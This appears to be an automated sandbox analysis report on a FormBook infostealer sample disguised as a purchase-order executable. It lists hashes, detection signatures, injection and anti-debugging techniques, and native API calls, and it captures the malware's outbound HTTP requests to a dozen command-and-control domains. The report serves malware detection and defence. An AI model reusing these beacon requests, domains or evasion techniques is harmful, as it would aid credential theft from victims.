Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name:	Purchase Order 40,7045$.exe
Analysis ID:	321097
MD5:	4142c1713da2f4f94bec71bfed46587b
SHA1:	06cc7bd53758a0936f4b674847411a4f912fd654
SHA256:	fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Executable has a suspicious name (potential lure to open the executable)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Uses ipconfig to lookup or modify the Windows network settings

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: Purchase Order 40,7045$.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: Purchase Order 40,7045$.exe	Virustotal: Detection: 43%			Perma Link
Source: Purchase Order 40,7045$.exe	ReversingLabs: Detection: 36%

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: Purchase Order 40,7045$.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 4x nop then pop edi	1_2_00415044
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 4x nop then pop edi	1_2_00415C88
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 4x nop then pop ebx	1_2_004066DA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi	5_2_02B15044
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop ebx	5_2_02B066DA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi	5_2_02B15C88

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View	IP Address: 185.201.11.126 185.201.11.126

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
Source: Joe Sandbox View	ASN Name: AS-HOSTINGERLT AS-HOSTINGERLT

Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.handsfreedocs.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 10:07:21 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>

Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.hemparcade.com
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.hemparcade.com/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp	String found in binary or memory: http://yuyabo.com/

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Executable has a suspicious name (potential lure to open the executable)

Source: Purchase Order 40,7045$.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Purchase Order 40,7045$.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417BA0 NtCreateFile,	1_2_00417BA0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417C50 NtReadFile,	1_2_00417C50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417CD0 NtClose,	1_2_00417CD0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417D80 NtAllocateVirtualMemory,	1_2_00417D80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417C4C NtReadFile,	1_2_00417C4C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417CCA NtClose,	1_2_00417CCA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC98F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_00FC98F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_00FC9860
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9840 NtDelayExecution,LdrInitializeThunk,	1_2_00FC9840
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC99A0 NtCreateSection,LdrInitializeThunk,	1_2_00FC99A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_00FC9910
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9A50 NtCreateFile,LdrInitializeThunk,	1_2_00FC9A50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9A20 NtResumeThread,LdrInitializeThunk,	1_2_00FC9A20
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_00FC9A00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC95D0 NtClose,LdrInitializeThunk,	1_2_00FC95D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9540 NtReadFile,LdrInitializeThunk,	1_2_00FC9540
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC96E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_00FC96E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_00FC9660
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9FE0 NtCreateMutant,LdrInitializeThunk,	1_2_00FC9FE0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC97A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_00FC97A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9780 NtMapViewOfSection,LdrInitializeThunk,	1_2_00FC9780
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9710 NtQueryInformationToken,LdrInitializeThunk,	1_2_00FC9710
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC98A0 NtWriteVirtualMemory,	1_2_00FC98A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FCB040 NtSuspendThread,	1_2_00FCB040
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9820 NtEnumerateKey,	1_2_00FC9820
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC99D0 NtCreateProcessEx,	1_2_00FC99D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9950 NtQueueApcThread,	1_2_00FC9950
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9A80 NtOpenDirectoryObject,	1_2_00FC9A80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9A10 NtQuerySection,	1_2_00FC9A10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FCA3B0 NtGetContextThread,	1_2_00FCA3B0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9B00 NtSetValueKey,	1_2_00FC9B00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC95F0 NtQueryInformationFile,	1_2_00FC95F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9560 NtWriteFile,	1_2_00FC9560
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FCAD30 NtSetContextThread,	1_2_00FCAD30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9520 NtWaitForSingleObject,	1_2_00FC9520
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC96D0 NtCreateKey,	1_2_00FC96D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9670 NtQueryInformationProcess,	1_2_00FC9670
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9650 NtQueryValueKey,	1_2_00FC9650
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9610 NtEnumerateValueKey,	1_2_00FC9610
